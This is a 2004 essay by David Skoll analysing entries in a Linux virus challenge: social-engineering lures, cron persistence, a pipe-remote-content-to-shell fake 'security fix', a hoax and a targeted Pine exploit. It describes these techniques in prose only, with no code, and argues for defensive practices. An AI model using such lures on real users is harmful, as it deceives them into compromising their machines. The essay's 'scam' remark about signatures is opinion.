David Skoll Bio    Free Software    Articles & Presentations    Signatures & Privacy    Careers   
Home > About > Articles

But seriously...

The virus entries in the challenge were fun and good for a bit of a laugh, but they illustrate serious issues in computer security.

Entry 1

Entry 1 is a classical social-engineering attack. It relies on the recipient to perform some kind of action to activate the malicious software. Now clearly, Entry 1 has little chance of spreading, because the actions which the user must take involve several steps, would immediately arouse the suspicions of experienced Linux users, and would be beyond the capabilities of novice users.

The reason social-engineering attacks are so successful on Microsoft platforms, especially Microsoft Outlook, is that the kind of thing you need to trick the user into doing is very simple---typically a single mouse-click. True, many installations pop up warning dialogs for "potentially dangerous" actions, but novice users are used to many such dialogs, and probably just dismiss them as a matter of course.

Nagging the user is not a substitute for security.

Entry 2

Entry 2 is a "mutation" of entry 1. It is somewhat nastier in that it tries to install itself in your cron table and re-execute the malicious code periodically.

Mutations are interesting for the following reason: Most commercial anti-virus software relies on signatures to detect viruses. Such signatures are next to useless in the face of easily-mutated viruses. In fact, the whole idea of a signature database which must be updated periodically is a huge scam. It is designed simply to ensure a steady flow of revenue to anti-virus vendors.

Signatures cannot detect brand-new viruses, and usually fail to detect mutated viruses. Blocking all executable attachments at the server and using software which does not allow its data files to contain executable content are far more effective than any possible signature-based detection scheme.

Signatures fail in the face of new viruses, and are designed solely to ensure a revenue stream for anti-virus vendors.

Entry 3

Entry 3 also relies on tricking the recipient into performing an action. The action (running lynx and feeding the output to a shell) is not obviously malicious, however, and one popular Linux software creator actually recommends a similar action to install its software. Therefore, I consider Entry 3 the closest thing to something which could actually spread.

Entry 3 is interesting also because the actual viral code comes from a central server. This allows the virus author to track the spread of infection. By modifying the URL to contain more information, he could even track the names of people who are infected.

On the other hand, a central-server approach makes it much easier to track down the person responsible for a virus, and also introduces a single point of failure in the propagation mechanism.

Entry 3 is interesting also because it purports to install a security fix for a serious problem. If the URL had looked like it came from a legitimate site, people might be tempted to run the command. For example, the following URL looks like it points to Microsoft:


but it does not...

Note that popular "web bugs" use a similar mechanism to allow marketers to track the recipients of SPAM e-mail. This is why I recommend reading your e-mail in a non-HTML mail reader, or at the very least, a mail reader which does not automatically fetch URLs.

Beware of automatic-execution of remotely-fetched content. Beware even of mail readers which automatically fetch content off the Internet.

Entry 4

Entry 4 is simply a hoax. It was mailed from a machine owned by Via Networks in France.

Hoaxes are interesting because for a while, there were many virus hoaxes circulating on the Internet. Because people are so used to Windows machines being infected by viruses, these hoaxes can cause almost as much damage as real viruses. They also serve as advertising for anti-virus vendors, who must be fairly satisfied with their marketing potential.

If you can't trust your software, even hoaxes can be as damaging as real viruses

Entry 5

Entry 5 was a real attempt at an exploit, and it had a very good chance of succeeding. It may well have compromised my machine, although the chances of propagation beyond that were fairly slim.

Software diversity makes it harder for viruses to propagate.

But even UNIX users cannot be complacent. If I hadn't upgraded Pine as soon as I heard about the vulnerability, and if I hadn't been suspicious of the e-mail, I could well have fallen victim to the exploit. Nevertheless, I still believe that mass-mailing viruses are almost impossible under Linux, because Entry 5 was a carefully-target exploit aimed at me by someone who knew my software setup.

David F. Skoll

  Copyright © 2004 Roaring Penguin Software Inc.         Legal Notices